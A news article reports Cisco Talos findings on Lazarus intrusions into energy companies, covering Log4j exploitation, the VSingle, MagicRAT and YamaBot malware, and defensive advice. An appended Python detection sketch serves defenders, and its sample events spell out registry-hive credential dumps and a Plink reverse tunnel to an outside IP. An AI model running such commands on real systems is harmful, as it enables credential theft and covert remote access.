TechRepublic on Flipboard

2022-09-17 03:55:20 By : Ms. Juels zhong


North Korean cyberespionage actor Lazarus targets energy providers with new malware

Lazarus, a North Korean cyberespionage group, keeps hitting energy providers in the U.S., Canada and Japan with a new malware arsenal.

Lazarus, also known as Hidden Cobra or Zinc, is a known nation-state cyberespionage threat actor originating from North Korea, according to the U.S. government. The threat actor has been active since 2009 and has frequently switched targets over time, probably in line with nation-state interests.

Between 2020 and 2021, Lazarus compromised defense companies in more than a dozen countries, including the U.S. It also targeted selected entities supporting strategic sectors such as aerospace and military equipment.

The threat actor is now aiming at energy providers, according to a new report from Cisco Talos.

Lazarus often uses very similar techniques from one attack to the next, as exposed by Talos (Figure A).

In the campaign reported by Talos, the initial vector of infection is the exploitation of the Log4j vulnerability on internet-facing VMware Horizon servers.

Once the targeted system is compromised, Lazarus downloads its toolkit from a web server it controls.

Talos has witnessed three variants of the attack, each differing in the malware deployed: VSingle alone, VSingle together with MagicRAT, or a new malware dubbed YamaBot.

Variations in the attack also involve other tools, such as mimikatz for credential harvesting, proxy tools to set up SOCKS proxies, or reverse tunneling tools such as Plink.

Lazarus also checks for installed antivirus on endpoints and disables Windows Defender antivirus.

The attackers also copy parts of the Windows Registry hives for offline analysis and possible exploitation of credentials and policy information, and gather information from Active Directory before creating their own high-privileged users. These users are removed once the attack is fully in place, along with temporary tools, and the Windows Event logs are cleaned.

At this point, the attackers take their time to explore the systems, listing multiple folders and putting those of particular interest, mostly proprietary intellectual property, into a RAR archive file for exfiltration. The exfiltration is done via one of the malware families used in the attack.

Lazarus is a state-sponsored cyberespionage threat actor with the capability to develop and distribute its own malware families. Lazarus has created several malware families, which it uses for its operations. Three different malware families are used in the current attack campaign exposed by Talos, dubbed VSingle, YamaBot and MagicRAT.

VSingle is a persistent backdoor used by the threat actor to run different activities, such as reconnaissance, exfiltration and manual backdooring. It is a basic stager, enabling attackers to deploy more malware or to open a reverse shell that connects to a C2 server controlled by the attackers, which allows them to execute commands via cmd.exe.

Using VSingle, Lazarus typically runs commands on infected computers to collect information about the system and its network. All this information is needed for lateral movement activities, in which attackers plant more malware on other systems or find information to exfiltrate later.

Lazarus has also used VSingle to force the system to cache users' credentials so they can be collected afterward. The threat actor has also used it to grant administrator privileges to users it added to the system. This way, even if the malware is fully removed, attackers might still access the network via Remote Desktop Protocol (RDP).

Lazarus makes use of two additional tools alongside VSingle: a utility called Plink, which enables the creation of encrypted tunnels between systems via the Secure Shell (SSH) protocol, and another tool named 3proxy, a small, publicly available proxy server.

MagicRAT is the newest malware developed by the Lazarus team, according to Talos. It is a persistent malware developed in the C++ programming language. Interestingly, it uses the Qt framework, a programming library used for graphical interfaces. Since the RAT has no graphical interface, the use of the Qt framework is believed to be intended to increase the complexity of malware analysis.

Once running, the malware provides its C2 server with basic information about the system and its environment. It also provides the attacker with a remote shell and a few other features such as an automatic deletion of the malware or a sleep function to try to avoid being detected.

In some Lazarus group attacks, MagicRAT has deployed the VSingle malware.

During one particular attack, the Lazarus group deployed YamaBot after several attempts to deploy the VSingle malware. YamaBot is written in the Go programming language and, just like its peers, it starts by collecting basic information about the system.

YamaBot provides the capability to browse through folders and list files, download and execute files or arbitrary commands on the infected computer, or send back information about processes running on the machine.

While Talos does not disclose much about the actual targets of this attack campaign, the researchers mention that “Lazarus was primarily targeting energy companies in Canada, the U.S. and Japan. The main goal of these attacks was likely to establish long-term access into victim networks to conduct espionage operations in support of North Korean government objectives. This activity aligns with historical Lazarus intrusions targeting critical infrastructure and energy companies to establish long-term access to siphon off proprietary intellectual property.”

The Lazarus group makes heavy use of common vulnerabilities to compromise companies. In the current operation, it leveraged the Log4j vulnerability to gain an initial foothold on networks. Therefore, it is strongly advised to keep operating systems and all software up to date and patched to avoid such exploitation.

It is also advised to monitor all connections to RDP or VPN services coming from outside the company, since attackers sometimes impersonate employees by using their credentials to log in to systems. For this reason, it is also advised to deploy multi-factor authentication (MFA), so an attacker cannot simply use valid credentials to log in to systems.

Finally, security solutions need to be deployed and customized in order to detect malware and potential misuse of legitimate tools such as Plink.
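As an added example (not from the article or the Talos report), the following Python sketch shows how the post-compromise chain described above (Defender disabled, registry hive copies, new high-privileged users, Plink tunneling, event log clearing) and the recommendation to detect misuse of legitimate tools such as Plink could be expressed as simple correlation rules over Windows event records. The event records, hostnames, paths and the three-stage threshold are constructed for illustration; the event IDs used (4688, 4720, 4732, 1102 in the Security log, 5001 in the Defender operational log) are the standard Windows ones.

```python
import re
from collections import defaultdict

# Constructed sample events: trimmed Windows Security / Defender records as a SIEM might hold them.
SAMPLE_EVENTS = [
    {"host": "srv01", "id": 5001},                                 # Defender: real-time protection disabled
    {"host": "srv01", "id": 4688, "cmd": r"reg.exe save hklm\sam C:\Windows\Temp\s.bak"},
    {"host": "srv01", "id": 4688, "cmd": r"reg.exe save hklm\security C:\Windows\Temp\c.bak"},
    {"host": "srv01", "id": 4720, "user": "svc_update"},           # local user created
    {"host": "srv01", "id": 4732, "user": "svc_update", "group": "Administrators"},
    {"host": "srv01", "id": 4688, "cmd": r"C:\Windows\Temp\plink.exe -N -R 3389:127.0.0.1:3389 203.0.113.10"},
    {"host": "srv01", "id": 1102},                                 # Security event log cleared
    {"host": "srv02", "id": 4720, "user": "new.hire"},             # benign: one new user, nothing else
]

HIVE_DUMP = re.compile(r"\breg(\.exe)?\s+save\s+hklm\\(sam|security|system)\b", re.I)
TUNNEL_TOOLS = {"plink.exe", "3proxy.exe"}   # the tunneling/proxy tools named in the article

def classify(event):
    """Map one event to a stage of the playbook described above, or None if it matches none."""
    eid, cmd = event["id"], event.get("cmd", "")
    image = re.split(r"[\\/]", cmd.split(" ")[0])[-1].lower()   # basename of the launched binary
    if eid == 5001:
        return "defender_disabled"
    if eid == 4688 and HIVE_DUMP.search(cmd):
        return "registry_hive_dump"
    if eid == 4688 and image in TUNNEL_TOOLS:
        return "tunnel_or_proxy_tool"
    if eid == 4688 and "mimikatz" in cmd.lower():
        return "credential_dumper"
    if eid == 4720:
        return "local_user_created"
    if eid == 4732 and event.get("group", "").lower() == "administrators":
        return "user_added_to_admins"
    if eid == 1102:
        return "security_log_cleared"
    return None

def findings_by_host(events):
    """Return {host: sorted list of distinct stage labels seen on that host}."""
    out = defaultdict(set)
    for ev in events:
        label = classify(ev)
        if label:
            out[ev["host"]].add(label)
    return {h: sorted(f) for h, f in out.items()}

def flagged_hosts(events, threshold=3):
    """Hosts showing at least `threshold` distinct stages; a lone new-user event stays below the bar."""
    return sorted(h for h, f in findings_by_host(events).items() if len(f) >= threshold)
```

Correlating several stages per host, rather than alerting on any single event, keeps a routine account creation from paging anyone while the full chain on srv01 is still surfaced.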

Disclosure: I work for Trend Micro, but the views expressed in this article are mine.
